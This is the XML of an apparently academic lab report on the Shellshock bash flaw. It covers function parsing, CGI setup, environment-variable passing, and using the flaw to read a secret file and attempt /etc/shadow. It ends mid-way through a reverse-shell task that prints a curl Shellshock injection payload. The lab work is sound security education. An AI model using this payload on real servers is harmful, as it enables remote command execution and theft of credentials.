    <w:p w14:paraId="747AA853" w14:textId="20987A74" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="149E8930" w14:textId="2101B022" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="58CEDCF2" w14:textId="12FF0C87" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="5D905E00" w14:textId="0673005E" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="04E1CBE0" w14:textId="65570CEA" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="57976438" w14:textId="65EC91CE" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="3FA28765" w14:textId="5930F552" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="46403D81" w14:textId="29845B3A" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="55AC7FFC" w14:textId="55B6BE10" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="5EA64BA5" w14:textId="2CB0DEFF" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="18679F40" w14:textId="5A552015" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="0EBCAA90" w14:textId="76E7FD1F" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="3CE691E9" w14:textId="74787706" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="4C7B2A26" w14:textId="77777777" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="3DD88431" w14:textId="36541921" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="5354CBD9" w14:textId="771D1AE5" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="329DC5F1" w14:textId="69BF870A" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="73AC7853" w14:textId="77777777" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="3CF27EF3" w14:textId="3DFD0266" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="2E51DFE4" w14:textId="77777777" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="22BBEA1A" w14:textId="10D57265" w:rsidR="0092418D" w:rsidRPr="003360AA" w:rsidRDefault="0092418D" w:rsidP="003360AA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003360AA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part 2:</w:t>
      </w:r>
      <w:r w:rsidR="003360AA" w:rsidRPr="003360AA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shellshock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D3D076" w14:textId="7F35B7A2" w:rsidR="0092418D" w:rsidRDefault="0092418D" w:rsidP="0092418D"/>
    <w:p w14:paraId="4AD2C7E6" w14:textId="4BC1B99A" w:rsidR="0092418D" w:rsidRPr="00EF7225" w:rsidRDefault="0092418D" w:rsidP="0092418D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7225">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 1: Experimenting with Bash Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FA251B" w14:textId="77777777" w:rsidR="00396097" w:rsidRDefault="00396097" w:rsidP="0092418D"/>
    <w:p w14:paraId="49F02423" w14:textId="09153781" w:rsidR="0092418D" w:rsidRDefault="0092418D" w:rsidP="0092418D">
      <w:r w:rsidRPr="0092418D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DFF08D0" wp14:editId="4A1B73A9">
            <wp:extent cx="5943600" cy="29063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6395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55482B0A" w14:textId="6F8948EB" w:rsidR="0092418D" w:rsidRDefault="0092418D" w:rsidP="0092418D">
      <w:r w:rsidRPr="0092418D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00BF413B" wp14:editId="4BC12F09">
            <wp:extent cx="5943600" cy="2906395"/>
            <wp:effectExtent l="0" t="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06395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="270B994E" w14:textId="1A3104B8" w:rsidR="0092418D" w:rsidRDefault="0092418D" w:rsidP="0092418D"/>
    <w:p w14:paraId="658ED704" w14:textId="232CF1D4" w:rsidR="0092418D" w:rsidRDefault="0092418D" w:rsidP="0092418D">
      <w:r w:rsidRPr="00EF7225">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003360AA">
        <w:t xml:space="preserve"> Created a variable foo with the definition as shown in both patched bash (first one) and also in unpatched bash shell (second image). When exported the variable for child </w:t>
      </w:r>
      <w:r w:rsidR="003360AA">
        <w:lastRenderedPageBreak/>
        <w:t>shell, the patched bash showed the value of the variable as is. Whereas, in the unpatched one, the variable is parsed as function and the additional echo statement “extra” was executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B66AB25" w14:textId="3CC076F2" w:rsidR="0092418D" w:rsidRDefault="0092418D" w:rsidP="0092418D"/>
    <w:p w14:paraId="46D7300B" w14:textId="59D07B2B" w:rsidR="0092418D" w:rsidRDefault="0092418D" w:rsidP="0092418D">
      <w:r w:rsidRPr="00EF7225">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003360AA">
        <w:t>This behavior is due to the shellshock vulnerability in the bash shell, where it parses the variable when declared in that specific format, which was patched later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E3A73" w14:textId="77777777" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="6508A6E5" w14:textId="37555BC7" w:rsidR="0092418D" w:rsidRPr="00EF7225" w:rsidRDefault="00E9238E" w:rsidP="0092418D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7225">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 2: Setting up CGI programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7AB31E" w14:textId="5A362AB0" w:rsidR="0092418D" w:rsidRDefault="0092418D" w:rsidP="0092418D"/>
    <w:p w14:paraId="6B1082E4" w14:textId="176DF844" w:rsidR="0092418D" w:rsidRDefault="0092418D" w:rsidP="0092418D">
      <w:r w:rsidRPr="0092418D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A868EC4" wp14:editId="52515EB4">
            <wp:extent cx="5943600" cy="2372995"/>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72995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D9F5E2" w14:textId="74BACD3E" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="3D60C453" w14:textId="704DA018" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D">
      <w:r w:rsidRPr="00E9238E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D03B4A6" wp14:editId="282318B3">
            <wp:extent cx="5265019" cy="2102070"/>
            <wp:effectExtent l="0" t="0" r="5715"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1362" cy="2104602"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C880108" w14:textId="389C8266" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="67434B82" w14:textId="4556439A" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D">
      <w:r w:rsidRPr="009B07B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00DF4888">
        <w:t xml:space="preserve"> Created program called “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DF4888">
        <w:t>myprog.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DF4888">
        <w:t>” with unpatched bash version (/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DF4888">
        <w:t>bash_shellshock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DF4888">
        <w:t>) and when invoked from either browser or curl, the script was executed and displayed the “Hello World” message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAB46F5" w14:textId="71CDED88" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="041E7405" w14:textId="0200B044" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D">
      <w:r w:rsidRPr="009B07B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DF4888">
        <w:t xml:space="preserve">We just invoked the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DF4888">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DF4888">
        <w:t xml:space="preserve"> program and the web server executed it. But using this we will do the exploits in the next tasks. (This task is executed from same computer, so used localhost).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52506405" w14:textId="7119F9A4" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="0C8B0E7A" w14:textId="657740E6" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="2B01A866" w14:textId="79A619A8" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="7433429B" w14:textId="6D8F28D2" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="281DEB83" w14:textId="1EE0D7BC" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="55262873" w14:textId="33EA9B38" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="7259F580" w14:textId="77777777" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="069C6978" w14:textId="5972AA6B" w:rsidR="00E9238E" w:rsidRPr="00EF7225" w:rsidRDefault="00E9238E" w:rsidP="0092418D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7225">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 3: Passing Data to Bash via Environment Variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F00B26D" w14:textId="78C9B41F" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0FEFC3" w14:textId="002C1ABA" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="370A0259" w14:textId="3A32015F" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D">
      <w:r w:rsidRPr="00E9238E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E0A919E" wp14:editId="4A91107A">
            <wp:extent cx="5943600" cy="37592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9200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6B6651" w14:textId="55644EF8" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="46D19D5E" w14:textId="393E31B7" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D">
      <w:r w:rsidRPr="002E585B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="000205DE">
        <w:t xml:space="preserve"> Created a nee shell program called “</w:t>
      </w:r>
      <w:r w:rsidR="000205DE" w:rsidRPr="000205DE">
        <w:t>﻿</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000205DE" w:rsidRPr="000205DE">
        <w:t>myprog_env.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000205DE">
        <w:t xml:space="preserve">” and copied to </w:t>
      </w:r>
      <w:r w:rsidR="000205DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000205DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000205DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000205DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000205DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-bin/ directory with root as owner and with 755 permissions. When called the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000205DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000205DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> program through curl with custom user agent string, I can see the custom string in environment variables under HTTP_USER_AGENT. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9B319" w14:textId="3058A2FF" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="5371CD1A" w14:textId="1861B8C8" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D">
      <w:r w:rsidRPr="002E585B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002E585B">
        <w:t xml:space="preserve"> With curl -A we can pass the custom agent information and the web server will receive it and show it under HTTP_USER_AGENT. The program “</w:t>
      </w:r>
      <w:r w:rsidR="002E585B" w:rsidRPr="000205DE">
        <w:t>﻿</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002E585B" w:rsidRPr="000205DE">
        <w:t>myprog_env.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002E585B">
        <w:t>” has “</w:t>
      </w:r>
      <w:r w:rsidR="002E585B" w:rsidRPr="002E585B">
        <w:t>strings /proc/$$/environ” statement, so when the script executed, it displayed all the environment variables of the current ($$) process</w:t>
      </w:r>
      <w:r w:rsidR="002E585B">
        <w:t>. (This task is executed from same computer, so used localhost).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2777E218" w14:textId="1476DD85" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="2F1D06D1" w14:textId="079B4F0E" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="6C34785E" w14:textId="33FA9567" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="2F424F95" w14:textId="1DF3E5B1" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="30BF739F" w14:textId="3BC356B4" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="4FE21D38" w14:textId="3087C16A" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="6313D1B4" w14:textId="0A60CA33" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="3E39B7E8" w14:textId="47510DA8" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="12A0F84B" w14:textId="4206B5FD" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="16808640" w14:textId="77777777" w:rsidR="009B07B4" w:rsidRDefault="009B07B4" w:rsidP="0092418D"/>
    <w:p w14:paraId="6A1C0166" w14:textId="61D07073" w:rsidR="006A57A6" w:rsidRPr="00EF7225" w:rsidRDefault="006A57A6" w:rsidP="0092418D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7225">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 4: Launching the Shellshock Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD78016" w14:textId="22061199" w:rsidR="00E9238E" w:rsidRDefault="00E9238E" w:rsidP="0092418D"/>
    <w:p w14:paraId="5DDDE56F" w14:textId="446208F2" w:rsidR="000205DE" w:rsidRDefault="006A57A6" w:rsidP="0092418D">
      <w:r w:rsidRPr="006A57A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="666C8FC6" wp14:editId="6E8588BC">
            <wp:extent cx="5943600" cy="2103120"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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03120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFE127D" w14:textId="26147CBD" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="7B02174D" w14:textId="1F7AA8BD" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D">
      <w:r w:rsidRPr="006A57A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22C520B0" wp14:editId="06A598D7">
            <wp:extent cx="5062888" cy="3037733"/>
            <wp:effectExtent l="0" t="0" r="4445"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8076" cy="3040846"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA81E78" w14:textId="77777777" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="2947DFD3" w14:textId="6B50C24F" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D">
      <w:r w:rsidRPr="00325C9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B052F4">
        <w:t xml:space="preserve"> Created a “/var/www/secret.txt” which has database password</w:t>
      </w:r>
      <w:r w:rsidR="00325C9F">
        <w:t xml:space="preserve"> and the file is owned by root user and readable to everyone. When executed the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00325C9F">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00325C9F">
        <w:t xml:space="preserve"> program over the curl with additional information in the request using cat on the file name, I got the response of the file content. Meaning the information in the secret file has been stolen by me. The same was tried on “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00325C9F">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00325C9F">
        <w:t xml:space="preserve">/shadow” file, but it was not success in retrieving the data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3DDB2A" w14:textId="520D9081" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="6D6D922E" w14:textId="5D93490A" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D">
      <w:r w:rsidRPr="00325C9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00325C9F">
        <w:t xml:space="preserve">Using the Shellshock vulnerability, passed the custom information using curl to invoke the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00325C9F">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00325C9F">
        <w:t xml:space="preserve"> program, but the content was parsed and executed on the server side and </w:t>
      </w:r>
      <w:r w:rsidR="00325C9F">
        <w:lastRenderedPageBreak/>
        <w:t>retrieved the information. Whereas for “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00325C9F">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00325C9F">
        <w:t xml:space="preserve">/shadow”, we didn’t get the file content because it is read protected file, where only root user can read it and, in this case, the program is not running with root user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346062D3" w14:textId="70BC15B6" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="7A99D7E2" w14:textId="7AFBE12C" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="07E8ED6A" w14:textId="07C3543E" w:rsidR="006A57A6" w:rsidRPr="00EF7225" w:rsidRDefault="006A57A6" w:rsidP="0092418D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7225">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 5: Getting a Reverse Shell via Shellshock Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B837D6D" w14:textId="77777777" w:rsidR="00463ACE" w:rsidRDefault="00463ACE" w:rsidP="0092418D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486E6BD0" w14:textId="3F5D9045" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D"/>
    <w:p w14:paraId="03747299" w14:textId="2136C7DE" w:rsidR="006A57A6" w:rsidRDefault="006A57A6" w:rsidP="0092418D">
      <w:r w:rsidRPr="006A57A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B4DB9F9" wp14:editId="0DA26A67">
            <wp:extent cx="5943600" cy="3235325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>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35325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9E4E96" w14:textId="4D39C082" w:rsidR="00463ACE" w:rsidRDefault="00463ACE" w:rsidP="0092418D"/>
    <w:p w14:paraId="3B9B2A45" w14:textId="12408EB6" w:rsidR="00463ACE" w:rsidRDefault="00463ACE" w:rsidP="0092418D">
      <w:r w:rsidRPr="00325C9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation:</w:t>
      </w:r>
      <w:r w:rsidR="00325C9F">
        <w:t xml:space="preserve"> For this task, I have set up a separate server machine and attacker machine, where server is running on 10.0.2.15 and attacker machine on 10.0.2.4. When executed the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00325C9F">
        <w:t>myprog.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00325C9F">
        <w:t xml:space="preserve">” from attacker machine as </w:t>
      </w:r>
      <w:r w:rsidR="00325C9F" w:rsidRPr="00325C9F">
        <w:t xml:space="preserve">﻿curl -A "() { echo Hack;}; echo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00325C9F" w:rsidRPr="00325C9F">
        <w:t>Content_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00325C9F" w:rsidRPr="00325C9F">
        <w:t>: text/plain; echo ; /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00325C9F" w:rsidRPr="00325C9F">
        <w:t>bash_shellshock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
